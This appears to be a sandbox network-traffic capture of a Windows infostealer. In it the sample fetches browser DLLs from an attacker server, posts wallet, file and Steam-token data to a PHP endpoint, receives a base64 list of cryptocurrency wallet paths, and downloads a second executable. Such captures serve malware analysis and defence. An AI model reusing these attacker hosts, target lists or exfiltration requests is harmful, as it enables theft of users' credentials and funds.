Dec 7, 2024 10:51:46.182246923 CET	1236	IN	Data Raw: c7 04 8b 4d c4 d3 e8 89 45 e0 8b 4d ec 8b 45 d0 8a 55 e8 e9 78 01 00 00 c7 45 e0 00 00 00 00 8a 55 e8 8b 4d ec e9 66 01 00 00 c7 45 e0 00 00 00 00 8b 4d ec 8a 55 e8 e9 54 01 00 00 0f b6 46 01 c1 e0 08 09 c1 83 fa 02 74 09 0f b6 46 02 c1 e0 10 09 Data Ascii: MEMEUxEUMfEMUTFtFMUEM)ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf
Dec 7, 2024 10:51:46.182444096 CET	1236	IN	Data Raw: 89 c2 8b 45 d0 89 75 d8 3b 75 c8 0f 83 c7 fe ff ff 8b 55 ec 01 ca 01 cf 01 4d dc 83 7d d8 00 0f 85 c4 fc ff ff 8b 45 f0 88 90 00 01 00 00 88 98 01 01 00 00 e9 74 fe ff ff 89 f8 89 cf 83 7d d8 00 0f 85 fd fd ff ff 8b 45 f0 89 f9 88 88 00 01 00 00 Data Ascii: Eu;uUM}Et}EPEE},7,7E@2CM.USWV\2tRAA q$]
Dec 7, 2024 10:51:46.190272093 CET	1236	IN	Data Raw: 18 ff ff ff 8b 75 b4 01 ce 8b 48 44 89 8d 34 ff ff ff 8b 55 c8 11 ca 8b bd 60 ff ff ff 01 fe 89 75 b4 13 55 98 31 d3 89 5d 94 89 d3 8b 85 64 ff ff ff 31 f0 89 85 64 ff ff ff 8b 4d ec 03 4d 94 89 4d ec 8b 55 e0 11 c2 89 55 e0 31 cf 8b 75 98 31 d6 Data Ascii: uHD4U`uU1]d1dMMMUU1u1tpH8}pLE]d1]1U]uuEE11E}tBP`MBTD]H
Dec 7, 2024 10:51:46.190347910 CET	1236	IN	Data Raw: c3 31 ca 89 d8 0f a4 d0 08 0f a4 da 08 8b 75 b8 03 b5 74 ff ff ff 8b 5d f0 13 9d 50 ff ff ff 01 d6 89 75 b8 11 c3 89 5d f0 8b 4d a8 31 d9 31 f7 89 fe 0f a4 ce 10 89 b5 58 ff ff ff 0f ac cf 10 89 bd 78 ff ff ff 8b 5d ec 01 fb 89 5d ec 8b 4d e0 11 Data Ascii: 1ut]Pu]M11Xx]]MM11\|}$E\]}UEM1Mu1}}EE11}0M,}M1M1u
Dec 7, 2024 10:51:47.801613092 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:48.243779898 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 7, 2024 10:51:49.115809917 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:49.626867056 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:49 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 7, 2024 10:51:50.378611088 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:50.821245909 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 7, 2024 10:51:53.831511021 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:54.274408102 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:54 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 7, 2024 10:51:54.935643911 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:55.378391981 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:55 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 7, 2024 10:51:56.022670984 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ Host: 185.215.113.206 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 10:51:57.137129068 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:57.222138882 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="message"wallets------JDGCFBAFBFHJEBGCAEGH--
Dec 7, 2024 10:51:57.668076992 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:57 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 7, 2024 10:51:57.671209097 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKE Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="message"files------FHCBGDAAFBKEBGDHDBKE--
Dec 7, 2024 10:51:58.115612984 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:58.129059076 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file"------EHJDGCBGDBKJKFHIECBA--
Dec 7, 2024 10:51:59.060714006 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:59.088258982 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 2d 2d 0d 0a Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="message"ybncbhylepme------AAKKFHCFIECAAAKEGCFI--
Dec 7, 2024 10:51:59.533237934 CET	271	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49852	185.215.113.16	80	7484	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:51:59.657782078 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 7, 2024 10:52:01.000255108 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 09:52:00 GMT Content-Type: application/octet-stream Content-Length: 3261440 Last-Modified: Sat, 07 Dec 2024 09:40:24 GMT Connection: keep-alive ETag: "67541808-31c400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@2<2@Wk`11 @.rsrc@.idata @bndlrsnx++@myoyjplj11@.taggant01"1@
Dec 7, 2024 10:52:01.000319958 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
